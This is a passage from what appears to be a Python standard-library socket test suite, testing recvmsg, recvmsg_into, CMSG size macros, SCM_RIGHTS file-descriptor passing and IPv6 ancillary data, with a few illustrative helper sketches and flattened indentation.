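# Illustrative sketch, not part of the test suite: recvmsg() returns a
# 4-tuple (data, ancdata, msg_flags, address), and passing MSG_PEEK in
# flags examines pending data without consuming it, as testRecvmsgPeek
# above demonstrates.  The helper name is hypothetical.
def _example_peek_then_read(sock, bufsize=1024):
    import socket
    peeked, _, _, _ = sock.recvmsg(bufsize, 0, socket.MSG_PEEK)
    data, ancdata, flags, addr = sock.recvmsg(bufsize)
    assert data.startswith(peeked)
    return data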
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
        # Receive into multiple buffers (scatter read).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
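# Illustrative sketch, not part of the test suite: CMSG_LEN(n) gives the
# total size of a control message carrying n bytes of data, while
# CMSG_SPACE(n) also accounts for trailing padding, so it is the right
# unit for sizing a receive buffer that may hold several items.  The
# helper name is hypothetical and requires socket.CMSG_SPACE (Unix only).
def _example_ancillary_bufsize(num_fds):
    import array
    import socket
    fd_bytes = num_fds * array.array("i").itemsize
    # Enough ancillary buffer space for one SCM_RIGHTS item of num_fds ints.
    return socket.CMSG_SPACE(fd_bytes)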
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
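# Illustrative sketch, not part of the test suite: passing file
# descriptors over an AF_UNIX socket with SCM_RIGHTS, mirroring what
# SCMRightsTest exercises above.  The helper names are hypothetical.
def _example_send_fds(sock, msg, fds):
    import array
    import socket
    return sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                                 array.array("i", fds))])
def _example_recv_fds(sock, msglen, maxfds):
    import array
    import socket
    fds = array.array("i")
    msg, ancdata, flags, addr = sock.recvmsg(
        msglen, socket.CMSG_LEN(maxfds * fds.itemsize))
    for cmsg_level, cmsg_type, cmsg_data in ancdata:
        if (cmsg_level == socket.SOL_SOCKET and
                cmsg_type == socket.SCM_RIGHTS):
            # Drop any truncated trailing integer before decoding.
            fds.frombytes(cmsg_data[:len(cmsg_data)
                                    - (len(cmsg_data) % fds.itemsize)])
    return msg, list(fds)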
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
